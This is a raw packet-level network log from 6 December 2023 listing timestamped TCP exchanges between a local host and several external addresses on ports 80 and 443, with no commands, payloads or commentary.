                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.894860029 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.894881964 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.894913912 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.894927025 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.894937038 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.894948006 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.894949913 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.894972086 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.894975901 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895010948 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895034075 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895045042 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895056963 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895067930 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895076990 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895088911 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895102024 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895138025 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895149946 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895173073 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895236015 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895247936 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895260096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895277977 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895298958 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895319939 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895333052 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895365000 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895370960 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895406008 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895418882 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895440102 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895457983 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895489931 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895509005 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895530939 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895564079 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895577908 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895617962 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895631075 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895651102 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895665884 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895699978 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895725012 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895737886 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895747900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895768881 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895781040 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895792961 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895813942 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895873070 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895884991 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895908117 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895940065 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895951986 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895962954 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895973921 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895976067 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895984888 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895996094 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.895997047 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896007061 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896022081 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896028996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896035910 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896069050 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896102905 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896126032 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896137953 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896147966 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896168947 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896168947 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896198988 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896202087 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896270990 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896306038 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896641016 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896770954 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896783113 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896794081 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896810055 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896822929 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896831989 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896843910 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896864891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896883965 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896904945 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896915913 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896927118 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896936893 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896961927 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896985054 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.896997929 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897007942 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897030115 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897051096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897063017 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897073984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897084951 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897084951 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897109985 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897125959 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897147894 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897159100 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897222996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897258043 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897264004 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897277117 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897310972 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897330046 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897342920 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897353888 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897375107 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897397995 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897422075 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897439003 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897470951 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897512913 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897526026 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897538900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897548914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897569895 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897573948 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897603035 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897625923 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897638083 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897649050 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897667885 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897689104 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897721052 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897753000 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897766113 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897777081 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897797108 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897814989 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897826910 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897871971 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897877932 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897901058 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897912025 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897944927 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897977114 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.897996902 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898065090 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898101091 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898113012 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898160934 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898175001 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898196936 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898219109 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898253918 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898276091 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898349047 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898361921 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898392916 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898396015 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898432016 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898447990 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898458958 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898469925 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898492098 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898514032 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898542881 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898554087 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898574114 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898591995 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898617983 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898631096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898644924 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898659945 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898662090 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898699999 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898720980 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898732901 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898763895 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898786068 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898797035 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898814917 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898875952 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898875952 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898889065 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898900032 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898933887 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898942947 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898943901 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898947001 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.898992062 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.899008989 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.899022102 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.899058104 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:04.002224922 CET4970580192.168.2.5104.21.52.223
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:04.096452951 CET8049705104.21.52.223192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:04.952131033 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:04.952856064 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:05.014228106 CET8049705104.21.52.223192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:05.069438934 CET4970580192.168.2.5104.21.52.223
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.249046087 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.249135017 CET44349707172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.249253035 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.254972935 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.255012989 CET44349707172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.460129023 CET44349707172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.460241079 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.573304892 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.573342085 CET44349707172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.573714972 CET44349707172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.573781967 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.576853037 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.620750904 CET44349707172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.705445051 CET44349707172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.705559015 CET44349707172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.705683947 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.705683947 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.707233906 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.707233906 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.707304001 CET44349707172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.707411051 CET49707443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.709414005 CET49708443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.709496021 CET44349708172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.709628105 CET49708443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.710211039 CET49708443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.710249901 CET44349708172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.912957907 CET44349708172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.913220882 CET49708443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.921518087 CET49708443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.921570063 CET44349708172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.921802044 CET49708443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.921816111 CET44349708172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.172064066 CET44349708172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.172125101 CET44349708172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.172214985 CET49708443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.172251940 CET49708443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.173183918 CET49708443192.168.2.5172.67.198.151
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.173224926 CET44349708172.67.198.151192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.321511984 CET49709443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.321554899 CET44349709185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.321657896 CET49709443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.322355986 CET49709443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.322376966 CET44349709185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.874172926 CET44349709185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.874478102 CET49709443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.881799936 CET49709443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.881824970 CET44349709185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.882237911 CET44349709185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.882322073 CET49709443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.882824898 CET49709443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.928739071 CET44349709185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.063851118 CET44349709185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.063987017 CET49709443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.064017057 CET44349709185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.064039946 CET44349709185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.064069986 CET49709443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.064099073 CET49709443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.064105034 CET44349709185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.064121962 CET49709443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.065201998 CET49710443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.065236092 CET44349710185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.065313101 CET49710443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.065677881 CET49710443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.065692902 CET44349710185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.613290071 CET44349710185.23.108.224192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.613401890 CET49710443192.168.2.5185.23.108.224
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:09.613993883 CET49710443192.168.2.5185.23.108.224
